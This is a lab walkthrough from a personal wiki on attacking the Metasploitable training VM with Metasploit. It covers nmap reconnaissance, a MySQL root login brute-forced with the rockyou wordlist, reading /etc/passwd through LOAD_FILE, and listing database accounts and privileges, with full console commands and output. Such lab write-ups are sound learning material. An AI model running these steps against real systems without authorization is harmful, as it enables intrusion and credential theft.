MSF
From charlesreid1
Metasploit framework info: http://docs.kali.org/general-use/starting-metasploit-framework-in-kali
Basics
Initializing DB
First, you want postgresql to run as a server:
$ service postgresql start
This is the database format that MSF uses.
Now initialize the database:
$ msfdb init
Running
To get a metasploit console, run
$ msfconsole
Capturing Metasploit Console Output
If you want to capture the output you're seeing in Metasploit framework console, you can use the spool command.
spool /root/box/metasploitable/metasploit.log
If the spool command is not accessible, use the msfupdate command.
msf > spool /root/box/metasploitable/metasploit.log [*] Spooling to file /root/box/metasploitable/metasploit.log... msf >
To stop recording, set spool to off:
msf > spool off [*] Spooling is now disable msf >
Usage Example: Metasploitable Virtual Box
As an example of how we can use metasploit, we'll be looking at the Metasploitable virtual box.
Setting Up Metasploitable
Downloaded virtual disk image, loaded it up in a 64-bit Linux virtualbox instance.
The networking configuration was, I had the VirtualBox instance running on a Mac, and was attacking from a machine running Kali Linux. Both computers were on a private network and o n the same subnet.
From VirtualBox, I created a bridged network adapter (meaning, VirtualBox can send/receive messages directly through that interface). Next, I flipped the switch on the VirtualBox, and away we went. The router automatically assigned an IP address to the Metasploitable VirtualBox.
Recon
Make a box for stuff:
$ mkdir -p box/metasploitable
Start by using nmap to scan the host.
First a fast scan -F:
$ nmap -F 10.0.0.*
Then we can do a more extensive scan:
$ nmap -sS 10.0.0.*
This reveals the IP address of the VirtualBox, which is 10.0.0.27.
We can also do a deeper scan:
$ nmap -sS -sV -A 10.0.0.27
This will reveal an array of services, some of which may be exploitable using metasploit.
Sure enough, the verbose scan returns lots of good information:
$ nmap -sS -sV -A 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT Nmap scan report for 10.0.0.27 Host is up (0.016s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2010-03-17T14:07:45 |_Not valid after: 2010-04-16T14:07:45 |_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time. 53/tcp open domain ISC BIND 9.4.2 | dns-nsid: |_ bind.version: 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 42810/tcp mountd | 100005 1,2,3 45599/udp mountd | 100021 1,3,4 34385/tcp nlockmgr | 100021 1,3,4 60702/udp nlockmgr | 100024 1 38085/udp status |_ 100024 1 52004/tcp status 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open java-rmi Java RMI Registry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 8 | Capabilities flags: 43564 | Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression | Status: Autocommit |_ Salt: w$K,8vk7k8tagd@PR*zK 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) | vnc-info: | Protocol version: 3.3 | Security types: |_ Unknown security type (33554432) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd | irc-info: | users: 1 | servers: 1 | lusers: 1 | lservers: 0 | server: irc.Metasploitable.LAN | version: Unreal3.2.8.1. irc.Metasploitable.LAN | uptime: 0 days, 1:05:20 | source ident: nmap | source host: 6D4CD63B.D3975B40.7B559A54.IP |_ error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/5.5 MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP |_ System time: 2016-03-22T21:31:31-04:00 TRACEROUTE HOP RTT ADDRESS 1 16.11 ms 10.0.0.27 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
MySQL
Let's focus on the MySQL service:
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 8 | Capabilities flags: 43564 | Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression | Status: Autocommit |_ Salt: w$K,8vk7k8tagd@PR*zK
This is a very old version of MySQL (5.0.5, the current version is 5.7.11). If we look for mysql exploits in metasploit, we find this one: https://www.offensive-security.com/metasploit-unleashed/scanner-mysql-auxiliary-modules/
This is a brute-force login exploit for MySQL.
msf > use auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 3306 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts
Note that in order to successfully use this, we'll need some wordlists for username and password combinations.
We can illustrate the process using some of the wordlists included with Kali, in /usr/share/wordlists.
We'll use the rockyou list:
$ cd /usr/share/wordlists $ gunzip rockyou.txt.gz $ ls -lh rockyou.txt
Now that we have rockyou.txt as our wordlist, let's use it as the password file with metasploit.
Here, we set various options for this particular exploit.
We set threads to 1000, to make it brute force.
We set RHOSTS to the IP address of the metasploitable virtualbox (10.0.0.27).
Set the password file to be the rockyou password list.
Set the username to "root" - if you're going to brute-force a password, it should probably be the one that can do everything.
And make sure and try blank passwords - because you never know.
msf auxiliary(mysql_login) > set THREADS 1000 THREADS => 1000 msf auxiliary(mysql_login) > set RHOSTS 10.0.0.27 RHOST => 10.0.0.27 msf auxiliary(mysql_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt PASS_FILE => /usr/share/wordlists/rockyou.txt msf auxiliary(mysql_login) > set USERNAME root USERNAME => root msf auxiliary(mysql_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf auxiliary(mysql_login) > set VERBOSE false VERBOSE => false msf auxiliary(mysql_login) > set BLANK_PASSWORDS true BLANK_PASSWORDS => true
Now run the exploit:
msf auxiliary(mysql_login) > run
msf auxiliary(mysql_login) > run [*] 10.0.0.27:3306 MYSQL - Found remote MySQL version 5.0.51a [+] 10.0.0.27:3306 MYSQL - Success: 'root:' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mysql_login) >
Looks like the root user on the database does not have a password. A bit of a lame challenge, but I'll take it!
Exploiting MySQL
Once you have credentials to connect to the MySQL server, you will want to pivot from recon mode to attack mode. This means you'll be using different exploits from metasploit. Whereas the initial exploit was a scanner, the subsequent exploits will be admin exploits.
There are two different ways to exploit the MySQL server to obtain system information and database information. These are covered below.
Obtain /etc/passwd from MySQL with Metasploit
The mysql_sql exploit can be used to connect to the remote database and scan the contents of the /etc/passwd file to get a list of users on the system.
This is done by executing SQL's load_file() function.
We'll be using an auxiliary/admin/ exploit in metasploit. This one is auxiliary/admin/mysql/mysql_sql:
msf auxiliary(mysql_login) > use auxiliary/admin/mysql/mysql_sql msf auxiliary(mysql_sql) >
This one has fewer options:
msf auxiliary(mysql_sql) > show options Module options (auxiliary/admin/mysql/mysql_sql): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOST yes The target address RPORT 3306 yes The target port SQL select version() yes The SQL to execute. USERNAME no The username to authenticate as
We'll use the root username and a blank password (as we found in the prior step). The Metasploitable virtualbox uses port 3306 for the sql server, so we'll leave rport alone. We will set RHOST to the IP address of the Metasploitable virtualbox. Finally, the SQL that we will execute is:
SELECT LOAD_FILE('/etc/passwd')
This can be set with MSF console like so:
msf auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_sql) > set PASSWORD ''
PASSWORD =>
msf auxiliary(mysql_sql) > set RHOST 10.0.0.27
RHOST => 10.0.0.27
msf auxiliary(mysql_sql) > set RPORT 3306
RPORT => 3306
msf auxiliary(mysql_sql) > set SQL select load_file(\'/etc/passwd\')
SQL => select load_file('/etc/passwd')
Now execute:
msf auxiliary(mysql_sql) > run
[*] Sending statement: 'select load_file('/etc/passwd')'...
[*] | root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
|
[*] Auxiliary module execution completed
msf auxiliary(mysql_sql) >
MySQL Enumerate Users
This is the other mysql admin exploit. This one will enumerate (list) all of the MySQL accounts on the system and their various privileges.
Using it is as easy as pie. You set the username and password variables to root and blank password, then set the port and remote host ip address. Then you're good to go.
msf auxiliary(mysql_sql) > use auxiliary/admin/mysql/mysql_enum msf auxiliary(mysql_enum) > show options Module options (auxiliary/admin/mysql/mysql_enum): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOST yes The target address RPORT 3306 yes The target port USERNAME no The username to authenticate as msf auxiliary(mysql_enum) > set PASSWORD '' PASSWORD => msf auxiliary(mysql_enum) > set USERNAME root USERNAME => root msf auxiliary(mysql_enum) > set RPORT 3306 RPORT => 3306 msf auxiliary(mysql_enum) > set RHOST 10.0.0.27 RHOST => 10.0.0.27
Now run the exploit and check out the info:
msf auxiliary(mysql_enum) > run [*] Running MySQL Enumerator... [*] Enumerating Parameters [*] MySQL Version: 5.0.51a-3ubuntu5 [*] Compiled for the following OS: debian-linux-gnu [*] Architecture: i486 [*] Server Hostname: metasploitable [*] Data Directory: /var/lib/mysql/ [*] Logging of queries and logins: OFF [*] Old Password Hashing Algorithm OFF [*] Loading of local files: ON [*] Logins with old Pre-4.1 Passwords: OFF [*] Allow Use of symlinks for Database Files: YES [*] Allow Table Merge: YES [*] SSL Connections: Enabled [*] SSL CA Certificate: /etc/mysql/cacert.pem [*] SSL Key: /etc/mysql/server-key.pem [*] SSL Certificate: /etc/mysql/server-cert.pem [*] Enumerating Accounts: [*] List of Accounts with Password Hashes: [*] User: debian-sys-maint Host: Password Hash: [*] User: root Host: % Password Hash: [*] User: guest Host: % Password Hash: [*] The following users have GRANT Privilege: [*] User: debian-sys-maint Host: [*] User: root Host: % [*] User: guest Host: % [*] The following users have CREATE USER Privilege: [*] User: root Host: % [*] User: guest Host: % [*] The following users have RELOAD Privilege: [*] User: debian-sys-maint Host: [*] User: root Host: % [*] User: guest Host: % [*] The following users have SHUTDOWN Privilege: [*] User: debian-sys-maint Host: [*] User: root Host: % [*] User: guest Host: % [*] The following users have SUPER Privilege: [*] User: debian-sys-maint Host: [*] User: root Host: % [*] User: guest Host: % [*] The following users have FILE Privilege: [*] User: debian-sys-maint Host: [*] User: root Host: % [*] User: guest Host: % [*] The following users have PROCESS Privilege: [*] User: debian-sys-maint Host: [*] User: root Host: % [*] User: guest Host: % [*] The following accounts have privileges to the mysql database: [*] User: debian-sys-maint Host: [*] User: root Host: % [*] User: guest Host: % [*] The following accounts have empty passwords: [*] User: debian-sys-maint Host: [*] User: root Host: % [*] User: guest Host: % [*] The following accounts are not restricted by source: [*] User: guest Host: % [*] User: root Host: % [*] Auxiliary module execution completed
Since we already have access to the root user in MySQL, there's no need to brute force other login names. However, if there were many users in a complex database, this might yield a treasure trove of usernames with different privileges, allowing you to see different sections of the database.
